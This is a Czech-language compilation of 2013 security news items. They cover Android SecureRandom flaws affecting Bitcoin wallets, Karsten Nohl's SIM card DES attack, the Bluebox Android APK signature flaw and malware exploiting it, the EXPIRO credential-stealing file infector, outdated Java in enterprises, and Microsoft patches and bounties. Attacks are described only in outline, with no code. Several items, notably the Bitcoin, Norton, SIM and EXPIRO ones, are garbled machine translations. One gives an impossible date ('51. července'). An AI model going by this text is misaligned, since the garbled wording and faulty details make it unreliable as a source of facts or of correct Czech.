Bezpečnostní inženýr společnosti Google, Mike Hearn, vysvětlil zranitelnost v e-mailu na Bitcoin vývojářů, podle ITProPortal: "Před několika dny jsme se dozvěděli, že provádění Android třídy Java SecureRandom obsahuje četná těžká vulnerabilities.As důsledku všechny soukromé klíče generován na Android telefony / tablety jsou slabé a některé podpisy byly pozorovány již kolize R hodnoty, což soukromý klíč musí být vyřešeny a peníze mají být ukradené. "

ESET Malware výzkumník Robert Lipovský psal v předchozím Žijeme bezpečnostní funkce, které Bitcoin a ostatní šifrovací měny jsou terčem kybernetických zločinců.

"Tam jsou četné malware rodinám, které dnes buď provést Bitcoin mining nebo přímo ukrást obsah Bitcoin obětí peněženky, nebo oba," píše Lipovský.

Bitcoin doporučuje uživatelům, "Aby znovu zachování stávajících peněženky, klíče rotace je nutné. Jedná se o vytvoření nového adresu s opraveného generátoru náhodných čísel a pak jej pošle všechny peníze v peněžence zpět k sobě. Pokud používáte peněženku Android pak důrazně doporučujeme upgrade na nejnovější verzi k dispozici v Play Store, jakmile se člověk stává k dispozici. Jakmile je vaše peněženka se otáčí, budete muset kontaktovat někoho, kdo uložené adresy generované telefonu a dát jim novou. "

Postu Bitcoin peněženky "v ohrožení", díky Android chybu zabezpečení poprvé objevil na Žijeme zabezpečení.


Zranitelnost SIM je možné snadno opravit

Operátoři i vydavatelé karet SIM se usilovně pustili do práce na odstranění dvou závažných bezpečnostních chyb v technologii karet SIM, která umožňuje získat vzdálený přístup k SIM. Podle výzkumníka, který tyto chyby objevil, by oprava neměla být příliš složitá.

Mobil | Hacking | Zranitelnosti

Karsten Nohl z bezpečnostní výzkumné laboratoře v Berlíně v pondělí oznámil, že miliony karet SIM pravděpodobně stále používají k ověřování bezdrátových aktualizací zastaralý způsob šifrování používaný v 70. letech minulého století. Podle Nohla je možné určitý druh SIM požádat o zaslání 56bitového klíče standardu DES, který dnes lze rychle prolomit pomocí běžného osobního počítače. Stačilo zaslat fiktivní bezdrátovou aktualizaci, na kterou některé SIM reagují chybovou zprávou s přiloženým šifrovacím klíčem. Do SIM je po prolomení klíče možné zaslat spyware, který získá přístup k důležitým údajům na kartě pomocí virtuálního stroje Java, kterou podporuje většina SIM.

Nohl odhadl, že takto je zranitelných zhruba 500 milionů telefonů, bez ohledu na značku a typ, protože se zneužívají funkce SIM nezávislé na přístroji, ve kterém je vložená. K odhadu dospěl po prozkoumání vzorku 1000 SIM od různých, především evropských, operátorů. Tuto zranitelnost je ovšem možné opravit pomocí principu, kterým ji lze i zneužít, tedy pomocí bezdrátové aktualizace. Navíc zcela bez nutnosti zásahu uživatele. U některých karet stačí podle Nohla přepnout ze zastaralého algoritmu DES na novější a odolnější Triple DES, který také podporují.

Operátoři navíc mohou podle Nohla zakázat zasílání SMS s nebezpečným kódem z neznámých zdrojů. Technologie SIM totiž umožňuje komunikovat s kartou pomocí speciálních SMS obsahujících kód, které operátoři používají k vzdáleným změnám jejich nastavení. Tyto zprávy jsou ovšem velmi specifické a není proto těžké je detekovat. Pokud tedy zašle útočník SMS obsahující kód pro kartu SIM, mohou operátoři zabránit v jejím odeslání na požadované číslo.

Protože se problém netýká jen několika operátorů, ale v podstatě všech, Nohl předal výsledky svého šetření Asociaci GSM. Podle něj se členové asociace nesnaží o vzájemné obviňování s výrobci karet, ale na odstranění této slabiny aktivně spolupracují. Nohl by měl celou problematiku zveřejnit 51. července na konferenci Black Hat security. Do té doby by si tedy měli operátoři s opravou této zranitelnosti pospíšit.


Android App Chyba zabezpečení Umožňuje únos

23.července 2013 OS | Zranitelnosti | Mobil | Hacking

Vážná zranitelnost Android, připravený být zveřejněny na konferenci blackhat, nyní veřejně známá. Tato chyba zabezpečení umožňuje útočníkům vložení škodlivého kódu do legitimních aplikací bez zrušení platnosti digitálního podpisu.

Android aplikace musí být digitálně podepsán. To umožňuje, aby jeden zajistila kódu v aplikaci nebylo manipulováno s, a také zajišťuje kódu byla poskytnuta úředním vydavatele. Navíc Android využívá app úrovni oprávnění systému, kde každá aplikace musí přiznat a přijmout oprávnění k provedení citlivé úkoly. Digitální podpis brání aplikací a jejich doprovodné oprávnění od uneseno.

Tento závažný Android chyba zabezpečení umožňuje útočníkovi skrýt kódu v legitimní aplikace a využití stávajících oprávnění k provádění citlivých funkcí prostřednictvím těchto aplikací. Podrobnosti o zranitelnosti lze nyní nalézt na internetu a jsou velmi snadno implementovat.

Injekční škodlivého kódu do legitimních aplikací byla obyčejná taktika se zlými úmysly app tvůrci na nějakou dobu. Nicméně, oni předtím potřeba změnit i aplikace a název vydavatele, a také podepsat Trojanized aplikace s vlastním digitálním podpisem. Někdo, kdo zkoumal app údaje mohly okamžitě realizovat aplikace nebyl vytvořen legitimní vydavatele. Nyní, když útočníci již není nutné měnit tyto podrobnosti digitálního podpisu, mohou volně unést legitimní aplikace a dokonce i chytrý člověk nemohl říct, že žaloba byla v novém obalu pomocí škodlivého kódu.

Přidali jsme logika zjišťování pro zranitelné stavu naší backend Norton Mobile Insight systémů a ze čtyř milionů aplikací, ještě neobjevili škodlivý využití zranitelnosti. Objevili jsme několik aplikací, které neúmyslně zneužívají křehkosti, nicméně. Tyto aplikace jsou postaveny na společné sestavení populární nástroj řetěz, který může mít za následek chybu poškozených souborů APK. Bohužel, tato chyba zabezpečení se týká 99 procent zařízení se systémem Android, a obvykle záplaty trvat nějakou dobu být nasazeny výrobců mobilních telefonů a dopravci, pokud vůbec.

Pokud byl škodlivý aplikace je zjištěna zneužití této chyby zabezpečení, budou uživatelé moci chránit instalací aplikace Norton Mobile Security . Po nainstalování aplikace Norton Mobile Security také pravidelně aktualizovat sám přidat více robustní ochranu proti této a budoucích chyb.

Díky zabezpečení BlueBox který objevil chybu.


Maskované viry zneužívají kritickou chybu Androidu

24.7.2013 Zranitelnosti | OS | Viry | Mobil

Bezpečnostní experti antivirové společnosti Bitdefender odhalili škodlivé programy maskované za regulérní aplikace. Ty zneužívají kritickou bezpečnostní chybu operačního systému Android, kterou mohou počítačoví piráti využít k ovládání počítačových tabletů a chytrých telefonů na dálku.

Viry se ukrývají v aplikacích Rose Wedding Cake Game a Pirates Island Mahjong Free. „Mezi uživateli Androidu jsou tyto programy poměrně populární. První má více než 10 000 stažení a druhý přes 5000,“ uvedl bezpečnostní expert z Bitdefenderu Bogdan Botezatu.

Podle něj však není důvod k panice, protože zatím nebyl zaznamenán případ, kdy by trhlina byla těmito aplikacemi zneužita. Navíc telefony a tablety s nainstalovanou bezpečnostní aktualizací dokážou podvodné programy odhalit.

Zneužita může být jakákoliv aplikace „Oprava již byla poskytnuta našim partnerům. Někteří výrobci, jako například Samsung, již aktualizaci pro svá zařízení vydali,“ uvedla již dříve pro server ZD Net produktová manažerka Androidu Gina Sciglianová.

Právě rychlost je podle bezpečnostních expertů to nejdůležitější, co ovlivní, v jaké míře bude chyba zneužívána. Doposud nebyl evidován podle tvůrců Androidu evidován ani jeden případ.

Uživatelé by tak měli kontrolovat aktualizace u výrobců svých zařízení. „Lze předpokládat, že dostupnost oprav se bude velmi lišit podle toho, o jakého výrobce se jedná,“ podotkl Jeff Forristal, šéf bezpečnostní společnosti Bluebox, která chybu v Androidu odhalila.

Chyba se týká přístrojů s Androidem, které přišly na trh v posledních čtyřech letech. Útočník může s její pomocí ovládat přístroj stejně, jako by jej držel v ruce. Může telefonovat, posílat textové zprávy, ale například i prohlížet uložená hesla. Na dálku dokonce může klidně zapnout i zabudovanou webkameru.

Zranitelnost umožňuje počítačovým pirátům proměnit originální programy v trojské koně, aniž by to byl uživatel schopen při instalaci poznat. Takto zneužita může být prakticky jakákoliv aplikace, upozornily servery VentureBeat a SecurityWeek.


"Obrovsky významná" SIM karta zranitelnost opustí miliony mobilních telefonů v ohrožení
Zaslal: 22 červenec 2013 03:44 PDT
Zranitelnosti | Hacking | Mobil
Miliony SIM karet v použití dnes jsou náchylné k hackování - umožňuje útoky, kde by SIM karty lze klonovaných dálku nebo hlasové čísla mohou být změněna, podle německé bezpečnostní výzkumník.

Zranitelnost používá Sedmdesátá léta-éra šifru ještě používá na milionech SIM karet po celém světě, podle Karsten Nohl a bezpečnosti výzkumných laboratoří. Nohl výzkum budou prezentovány na konferenci o bezpečnosti v BlackHat v Las Vegas na 31. července. Karsten Nohl říká: "S více než sedm miliard karet v aktivním používání může být i SIM karet nejrozšířenější bezpečnostní klíč na světě."

"Můžeme špehovat na vás. Známe své šifrovací klíče pro volání. Můžeme číst vaše SMS. Více než jen špionáže, můžeme krást data z karty SIM, mobilní identity a náboje do svého účtu ", Nohl řekl v rozhovoru pro New York Times.

Existuje šest miliard mobily v současné době používají - a mnozí stále používat zastaralé šifrování DES. Nohl testováno 1000 SIMS více než dva roky, a zjistil, že zhruba jedna čtvrtina byli zranitelní. OSN Mezinárodní telekomunikační unie přezkoumala výzkum a popsal ho jako "velmi významný". Generální tajemník ITU Hamadoun Touré řekl: "Tyto výsledky ukazují nám, kde bychom se mohli ubírat, pokud jde o kybernetické rizik."

Nohl tvrdí, že over-the-air aktualizace softwaru - odeslat jako kryptograficky zabezpečených SMS zpráv - pomocí vlastního softwaru Java, představuje "kritickou hacking riziko." Hackeři pošle nesprávně podepsaný příkaz OTA - ale karty odpoví kryptografického podpisu, který mohou být vyřešeny na 56-bitový klíč na "standardní počítač", a pozdní proliferace Nohl. To umožňuje útočníkovi nainstalovat Java applety.

Nohl říká: "Java applet může vymanit se z jeho oblasti a přístup zbytek karty. To umožňuje vzdálený klonování možná miliony SIM karet, včetně jejich mobilní identity (IMSI, Ki), stejně jako platební pověření uložených na kartě. Applety mohou posílat SMS, hlasové pošty změnit čísla a dotaz na polohu telefonu, kromě mnoha jiných předdefinovaných funkcí. Tyto schopnosti samy o sobě poskytují dostatek potenciálu pro zneužívání. "

Nohl říká, že obrovské množství karet "starších" SIM v použití znamená, že problém může být komplikovaná. Nové gnerations karet by měly být navrženy tak, aby odolat takové útoky, říká, ale mobilní telefony a sítě by také měly přijmout obrany.

"Karty je třeba použít state-of-art kryptografie s dostatečně dlouhými klíči, neměly zveřejňovat podepsané holé útočníkům, a musí zavést bezpečné Java virtuální stroje. Zatímco některé karty již téměř tohoto cíle, v letech potřeboval nahradit zranitelné starší karty vyžadují dodatečné obranu, "říká Nohl.

Post "obrovsky významné" SIM karta zranitelnost opustí miliony mobilních telefonů v ohrožení se objevil na prvním místě Žijeme zabezpečení.


Soubor infikuje EXPIRO hity USA, krade přihlašovací údaje FTP
21.07.2013 Hacking | Zranitelnosti | Viry
Neobvyklý útok byl spatřen ve volné přírodě, pomocí nečekanou kombinaci hrozeb. Tento útok používá využívat sestavy (zejména Java a PDF exploit) dodat souborů škodlivin na zranitelné systémy. Je zajímavé, že tyto soubory škodlivin mít k dispozici postupy úniku informací, což je chování, není obvykle možné nalézt mezi soubory škodlivin. Jedná malware jsou součástí rodiny PE_EXPIRO, že soubor škodlivin byl poprvé spatřen spatřen v roce 2010. . Kromě standardních rutin souborů infekce, varianty viděné v tomto útoku také rutiny úniku informací, neobvyklé rutina souborů škodlivin infekce řetěz zní asi takto:
 

Uživatel je lákal na škodlivé stránky, která obsahuje exploit kit. Několik exploity jsou používány, jeden z nich je exploit Java (detekován jako JAVA_EXPLOIT.ZC), který používá CVE-2012-1723. Další chyba Java (CVE-2013-1493) je také používán. PDF exploit je také používán s škodlivého souboru PDF detekované jako TROJ_PIDIEF.JXM.
Ať už se používá exploit, konečný výsledek je stejný: matka infikuje soubor (ať už PE_EXPIRO.JX-O, PE_EXPIRO.QW-O, nebo PE64-EXPIRO-O pro 64-bitové systémy) do postiženého systému.
Jakmile se na postiženém systému, hledá. EXE soubory v systému infikovat. Všechny složky ve všech dostupných jednotek (odnímatelné, sdílené síťové) jsou podrobeny vyhledávání. Infikované soubory jsou detekovány jako PE_EXPIRO.JX.
To krade systémové a uživatelské informace, jako je například Windows Product ID, disku, sériové číslo, verze pro Windows a pověření přihlášení uživatele. To také krade uložené FTP pověření od klienta FileZilla FTP.
Ukradené informace jsou pak uloženy v. DLL soubor a nahrát na různé velení a řízení (C & C) servery.
Zde je diagram z výše uvedeného řetězce, pomocí exploit Java jako příklad:
 

Asi 70% z celkového počtu infekcí je ve Spojených státech. Je možné, že tento útok měl krást informace od organizací nebo ohrozit webových stránek, jako zvláštní zaměření na FTP pověření naznačuje buď bylo možné. Kombinace použitých hrozeb je velmi neobvyklé a naznačuje, že tento útok nebyl off-the- . police útok, který se používá běžně dostupné počítačové trestné činnosti nástroje Autor: Rhena Inocencio, Threat Response inženýr Trend Micro. Doplňující analýza Dexter, Kai Yu a Jethro Bacani.


Staré verze Javy ohrožují bezpečnost firemních systémů

Z nové studie vyplývá, že většina velkých organizací si neuvědomuje nebezpečí, které jim může přinést používání zastaralé Javy v jejich systémech.

Zranitelnosti

Navzdory výrazným zlepšením bezpečnosti Javy, které Oracle provedl za posledního půl roku, se chyby v tomto programovacím jazyku neustále objevují a ohrožují firmy po celém světě. Vyplývá to z nové studie společnosti Bit9 založené na datech ze systémů téměř čtyř set nadnárodních organizací. Podle Bit9 je nejpoužívanější verzí Javy ve firemním prostředí verze 6, jež je v 80 % korporátních počítačů.

Veřejná podpora Javy 6 byla ukončena v dubnu a pouze zákazníci Oracle s dlouhodobou placenou podporou mohou i nadále pro tuto verzi získávat aktualizace. Nejnovější verze Javy s označením 7 se podle Bit9 nachází pouze v 15 % firemních systémů. Většina organizací, které využívají Javu 6, navíc nemá nainstalované nejnovější aktualizace. A to je špatné, jelikož například ve vůbec nejpoužívanější verzi Javy 6 Update 20 je 215 bezpečnostních děr. Dalším problémem je to, že ve většině firem je nainstalováno hned několik verzí Javy naráz.

Ze studie vyplývá, že ve 42 % společností jsou nainstalovány více než dvě verze Javy současně a ve 20 % firem dokonce tři. Podle Bit9 mají organizace průměrně ve svých systémech nainstalováno 50 různých druhů Javy. Okolo pěti procent organizací pak má nainstalováno dokonce více než sto verzí. „Většina správců si neuvědomuje, že i když aktualizace Javy 7 smaže existující instalace Javy 6, kompletní nová instalace Javy 7 neodstraní starší verze,“ říká Harry Sverdlove z Bit9. Ze studie dále vyplývá, že 93 % organizací má na svých počítačích nainstalovánu verzi Javy, která je minimálně pět let stará. Jedenapadesát procent firem pak má Javu starou pět až deset let.

Problém je v tom, že pokud je v systémech společnosti nainstalováno více verzí Javy naráz, útočníci se mohou zaměřit na starší verze a proniknout díky nim do systému. Jakmile se to stane, zabezpečení novější verze Javy již nepomůže. Podle Sverdlova je sice podpora více verzí Javy na korporátních systémech zajímavá pro uživatele, avšak z bezpečnostního hlediska jde o noční můru. Díky každé nainstalované verzi tohoto programovacího jazyka je pro útočníky jednodušší proniknout do systému. Sverdlove přirovnal z bezpečnostního hlediska používání pět až deset let staré verze Javy k používání Windows 95.

Většina firem si podle expertů ani neuvědomuje, jaká rizika existence více verzí Javy na firemních systémech naráz přináší. Každá firma by si proto podle Sverdlova měla vytvořit určitou politiku používání Javy a dodržovat ji. Bit9 ve své studii nakonec dodává, že většina útoků hackerů pomocí Javy se děje prostřednictvím modulů u webových prohlížečů. Firmy by si proto měly dávat pozor také na to, aby jejich prohlížeče spolu s přídavky byly vždy aktuální.


Správa zranitelností: Mocný nástroj pro bezpečnost IT

Zranitelnosti lze nalézt ve většině programů a zařízení. Je jen otázkou, zda je útočníci objeví a dokážou zneužít. Riziko těchto ataků může snížit implementace systémů správy zranitelností, které umí řadu chyb v systémech IT odhalit a případně odstranit.

Zranitelnosti

Program správy zranitelností VMP (Vulnerability Management Program) identifikuje slabá místa v síti organizace, monitoruje a sleduje jejich odstraňování, analyzuje prvotní příčiny těchto zranitelností a dělá strategické změny existujících procesů, aby byly prvotní příčiny tohoto stavu odstraněny.

Zranitelnosti jsou zjišťovány nějakým druhem hodnocení, jako je například posouzení následků. Nalezené chyby se přezkoumají a je kontaktuje se vlastník náchylného zařízení, jemuž se oznámí, že jeho systém obsahuje zranitelnost, kterou je nutné odstranit.

Vlastník systému chybu, jež vede k potenciálnímu ohrožení, odstraní a dá příslušnému administrátorovi vědět, že byla zranitelnost eliminována.

Dále se prověří prvotní příčina zranitelnosti, aby se zjistilo, proč se slabé místo v příslušném řešení vyskytlo (to znamená například chybějící oprava, konzole správce webu s výchozím heslem, SSLv2 atd.).

Rovněž se upraví aktuální procesy organizace (proces správy oprav, dokumentace základu minimálního zabezpečení, zásady a postupy atd.), tak aby se zabránilo opětovnému výskytu této zranitelnosti v budoucnu.

Základem je správné nastavení
Většina programů správy zranitelností velmi významně spoléhá na skenery sítě a webových aplikací, přestože by tyto technologie měly být doplněny manuálními kontrolami, jako jsou například testování prostřednictvím útoků a penetrace a posouzení webových aplikací metodou grey box.

Vyzrálý program VMP je pro úspěšnost libovolného programu zabezpečení rozhodující. Může totiž v případě korektní implementace pomoci identifikovat slabiny v programu správy oprav, v konfiguracích firewallů a směrovačů, v základu minimálního zabezpečení, v zásadách a postupech, ve školení vývojářů webových aplikací atd.

Na druhou stranu však, pokud je vyvinutý špatně, může vést k celkovému falešnému pocitu bezpečí.

Jaké jsou tedy hlavní příznaky selhání programů správy zranitelností?

1. Každý měsíc se na stejném hostitelském počítači objevují stejné zranitelnosti
Vytvořte zásady nutící vlastníky systémů k odstranění chyb, které byly v jejich systémech nalezeny. Tyto zásady by měly být přímo svázány se závažností zranitelnosti.

2. Každý měsíc se objevují stejné kategorie zranitelností
Prvotní příčiny zranitelnosti nalezené při posudku zabezpečení se musí analyzovat. Jakmile je problém detekován, musí se upravit procesy, aby se tato zranitelnost už v síti znovu neobjevila.
Úpravy procesů zahrnují mimo jiné změny programu správy oprav, změny současného základu minimálního zabezpečení, aktualizace skupinových zásad a podobně.

3. Osoba odpovědná za správu zranitelností musí brát antidepresiva
Před posouzením zabezpečení je důležité, abyste udělali následující: zjistěte, kdo vlastní konkrétní zařízení ve vaší síti, mějte zavedeny zásady, které nutí vlastníky systémů odstraňovat zranitelnosti, zaveďte procesy vyžadující analýzy prvotních příčin zjištěných zranitelností, aktualizujte procesy, abyste zajistili, že se zranitelnost neobjeví znovu.

4. Neprošli jste kontrolou certifikovaného auditora PCI (PCI ASV, Payment Card Industry Approved Scanning Vendor) dva týdny po posudku zranitelností
Při zjištění zranitelností je potřebné aktualizovat procesy, aby se odstranily nejen chyby, ale také proces, který jejich výskyt zapříčinil. Nesprávně nastavené procesy mohou zahrnovat správu oprav, pokyny pro zabezpečení počítačů a podobně.

5. Nemáte žádná důvěryhodná čísla prokazující fungování vašeho programu
Metriky týkající se programu správy zranitelností pečlivě sledujte. Odborníci doporučují mít na zřeteli především následující ukazatele: počet zranitelností zjištěných během posudků zabezpečení, závažnost těchto chyb, doba uplynulá do jejich odstranění, kategorie zjištěných zranitelností a jejich prvotní příčina, zařízení, kde byly chyby zjištěny, a počet falešných výskytů.

6. Skener zranitelností dává nekonzistentní výsledky
Při zjištění nekonzistencí je nutné najít jejich prvotní příčinu. Pokud pramení z použitých rozdílných nástrojů nebo metodiky, upravte tyto okolnosti tak, abyste získali srovnatelné výsledky.
Pokud nekonzistence pochází z něčeho, nad čím nemáte žádnou kontrolu, a nemůžete nic změnit, abyste ji získali (například úpravou počtu souběžných vláken využívaných skenerem webových aplikací), kontaktujte odpovídajícího dodavatele, abyste vyřešili prvotní příčinu problému.

7. Mnohé z „falešných výskytů“ jsou skutečné zranitelnosti
V případě, že se jako správce zranitelností dozvíte, že chyba je prý falešným výskytem, prověřte skutečný stav – tedy zda tomu tak je, nebo zda nejde o skutečnou zranitelnost. Nikdy ji neoznačujte za falešný výskyt, dokud jste neověřili, že byla skutečně zjednána náprava.

8. Spoléháte na to, že univerzální skenery zranitelností najdou zranitelnosti webových aplikací
Ke skenování celé infrastrukturní sítě použijte všeobecné skenery. Z testů vyčleňte webové aplikace a na ně nasaďte specializovaný systém.

9. Skenování není doplněno ručním testováním
Doplňte automatizované posouzení, jako je skenování zranitelností, i ručním otestováním s využitím technik jako testovací útoky, penetrační testy nebo manuální skenování ochrany webových aplikací.

10. V podniku neexistuje žádný program pro správu zranitelností
Řešení tohoto problému zní na první pohled velice jednoduše (koupě příslušného produktu), ale může to být složitý proces. Jednoduše řečeno, řešením je totiž vytvoření plně funkčního programu správy zranitelností.
Implementace ale může být poměrně komplikovaná, protože vytváření bezpečně fungujícího systému může vyžadovat hodně času a úsilí. Pamatujte si, že je lepší nejprve věnovat o něco více času samotnému programu správy zranitelností, než nasadit nedostatečně promyšlený produkt a pak řešit následky.

Úspěch znamená bezpečné IT
Při vývoji programu správy zranitelností je nezbytné zajistit měření úspěšnosti programu, zajistit, aby byl program reaktivní i aktivní, aby se zranitelnosti odstraňovaly během předem daného časového plánu a aby se „falešné výskyty“ před akceptováním takového stavu ručně prověřily.
Špatně implementovaný program správy zranitelností způsobí velké problémy a bezesné noci. Ačkoli vytvoření silného programu správy zranitelností od základu vyžaduje hodně práce, může být odměnou velký přínos pro celkový program zabezpečení.


Microsoft vydá šest kritických aktualizací

Microsoft dnes vydává balík aktualizací pro své produkty, které opravují šest kritických chyb v jeho produktech. Mimo jiné i závažnou chybu v Internet Exploreru.

Zranitelnosti

Microsoft dnes, stejně jako každé druhé úterý v měsíci, vydává balík bezpečnostních aktualizací. Pro červenec má společnost přichystány opravy šesti kritických chyb, jež útočník může zneužít ke vzdálenému spuštění kódu. Microsoft již několik dnů před vydáním aktualizací vydal obecný popis chyb, aby se na ně správci mohli připravit.

Šest kritických chyb, jež jsou tentokráte opravovány, se nachází v operačním systému Windows, .NET Frameworku, Silverlightu, sadě Office, Visual Studiu, systému Lync a Internet Exploreru (IE). Sedmá aktualizace je označena jako „důležitá“ a týká se bezpečnostního softwaru Windows Defender. Bezpečnostní analytik Wolfgang Kandek ze společnosti Qualys na svém blogu napsal, že nejdůležitější aktualizace se týká Internet Exploreru, jelikož opravuje díru v IE verzí 6 až 10 v operačních systémech Windows XP, Vista, 7, 8, Server 2003, Server 2008 a RT. Tyto operační systémy využívají stovky milionů lidí po celém světě.

Jak dále uvedl Kandek, Microsoft taktéž opraví zranitelnost typu zero day objevenou bezpečnostním analytikem Tavisem Ormandym. Tato chyba se týká způsobu, jakým je spravována paměť. Microsoft tuto zranitelnost označenou jako CVE-2013-3660 popsal jako „již déle známý problém ve Windows“.

Dnešní den bude pro správce systému trochu jiný než v jiných měsících. „Co se týče množství aktualizací, nejde o nic převratného, Microsoft však dnes vydá nadstandardní množství kritických oprav,“ dodal Kandek.


V Androidu je čtyři roky závažná bezpečnostní chyba

Poslední čtyři roky v operačním systému Android existuje zranitelnost, jež útočníkům umožňuje změnit jakoukoli legitimní aplikaci tak, aby fungovala jako trojský kůň.

Zranitelnosti Mobil

S informací přišel americký startup Bluebox Security, který chybu objevil a na konferenci Black Hat ji minulý měsíc prezentoval publiku. Tato zranitelnost využívá způsobu, jakým jsou androidové aplikace kryptograficky ověřovány, a umožňuje útočníkovi pozměnit soubor APK bez poškození kryptografického podpisu.
Když je aplikace nainstalována na zařízení, Android uloží její digitální podpis a všechny další aktualizace pro danou aplikaci musejí mít stejný podpis, aby se ověřilo, že pocházejí od jednoho autora. Chyba, kterou objevil Bluebox, však útočníkům umožňuje přidávat nebezpečný kód do již podepsaných aplikací bez prolomení digitálního podpisu.
Chyba v Androidu existuje od jeho verze 1.6 (kódové označení Donut), což znamená, že je ve všech zařízeních s tímto operačním systémem vydaných v uplynulých čtyřech letech. „V závislosti na typu aplikace může útočník chybu zneužít pro cokoli od krádeže dat až po vytvoření mobilního botnetu,“ uvedl Bluebox. Útočníci díky chybě mohou také získat plnou kontrolu nad zařízením.
Aplikace s trojskými koňmi se v současné době distribuují pomocí řady cest, především mailu, webových stránek nebo nahráním do obchodů s aplikacemi. Dobrou zprávou je, že distribuce závadných aplikací využívajících objevené chyby přes obchod Google Play není možná, jelikož Google pozměnil vstupní ověřovací proces pro aplikace tak, aby tomuto problému zabránil. Společnost navíc uvedla, že v jejím obchodu žádný software, který by byl zneužit výše uvedeným způsobem, není.
Pokud však útočník přesvědčí uživatele, aby nebezpečnou aktualizaci pro aplikaci staženou z Google Play nainstaloval manuálně, celý program v mobilním zařízení bude nahrazen novou verzí a nadále již nebude komunikovat s Google Play. Googlu byla existence chyby oznámena v únoru a v březnu Bluebox informace o ní poskytl svým partnerům v Open Handset Alliance. Ti se musí nyní rozhodnout, jak se k ní postaví. Podle Blueboxu je zatím proti chybě chráněn pouze jeden chytrý telefon, a to Samsung Galaxy S4. Google na aktualizaci pro svá zařízení Nexus stále pracuje.
Dostupnost aktualizací firmwaru pro tento problém se bude lišit podle jednotlivých zařízení, výrobců a operátorů. Otázkou v řadě případů bude, zda výrobci spolu s operátory vůbec vyhodnotí riziko jako dostatečné. „Ideální by bylo, pokud by všichni vydali aktualizaci, která tento bezpečnostní problém vyřeší, avšak z reality víme, že to takto bohužel nefunguje,“ uvedl Jeff Forristal z Blueboxu.


Překvapení: Microsoft bude platit za zranitelnosti v Internet Exploreru

Microsoft na rozdíl od řady dalších dodavatelů softwaru tradičně odmítá platit za objevené bezpečnostní zranitelnosti. Nyní společnost tuto svoji zásadu ale porušila – na světě je dočasný program, který nabízí odměny za chyby nalezené v beta verzi Internet Exploreru 11.

Zranitelnosti

Microsoft program oficiálně spustí 26. 6., kdy bude stávající verze Internet Exploreru 11 pro Windows 8.1 představena na vývojářské konferenci Build. Za bezpečnostní zranitelnost je přitom firma ochotna vyplatit až 11 000 dolarů; je to v kontrastu s celkovým přístupem Microsoftu, který v oblasti IT zabezpečení sponzoruje spíše tvorbu obecných konceptů, nikoliv samotné hledání děr.

Každopádně ještě významnější než zájem o bezpečnost webového prohlížeče je rovněž oznámený program Mitigation Bypass Bounty, kde Microsoft nabízí za nové techniky umožňující obejít ochranné mechanismy Windows 8 až 100 000 dolarů; v tomto případě se ovšem v souladu se standardní politikou Microsoftu nejedná o klasickou“platbu za zranitelnosti“.

Bezpečnostní analytici jsou postupem Microsoftu překvapeni. Očekávání, že Microsoft začne vyplácet odměny za nalezené bezpečnostní díry, existovalo od roku 2010, kdy tento postup zvolil Google. Microsoft ovšem nehodlá mít takovou politiku jako standard. Snad se firma pro tento krok rozhodla pouze a právě u beta verze MSIE 11, s cílem maximálně odladit verzi finální (tj. RTM). Štědrá částka za nalezené chyby údajně Microsoft stejně vyjde levněji, než kdyby poté zranitelnosti opravoval (a urychleně testoval mezi měsíčními várkami záplat) za běhu.

Z pohledu samotných hledačů zranitelností není postoj výrobce softwaru nutně až tak podstatný, protože (zcela legálně) za objevené chyby platí např. HP Tipping Point v rámci programu Zero Day Initiative, VeriSign/iDefense, ale i další subjekty. Nicméně tyto firmy sdílí příslušné informace se zákazníky i vládními agenturami a jde jim o zabezpečení reálně používaných systémů – proto neodměňují zranitelnosti v beta verzích produktů.

Každopádně v tuto chvíli není jasné, zda Microsoft hodlá podobný přístup rozšířit i na své další produkty. Program pro MSIE 11 je svým trváním omezen na 1 měsíc.

Doporučení a hodnocení analytiků jsou nejednoznačná. Tipping Point i VeriSign Microsoft o nalezených chybách jinak stejně informují – a zdarma. Google loni za chyby v Chrome zaplatil 380 000 dolarů, letos už 213 000. Samozřejmě je to v obratech obou společností číslo zanedbatelné, související chvála nebo hana bezpečnostních expertů může mít větší cenu...


Google nechá výrobcům jen sedm dní na opravu chyb

Nová politika zmenšuje okno, ve kterém softwaroví výrobci musí veřejně reagovat na tzv. chyby zero-day, které objevili výzkumníci Googlu a na které tyto výrobce upozornili.

Zranitelnosti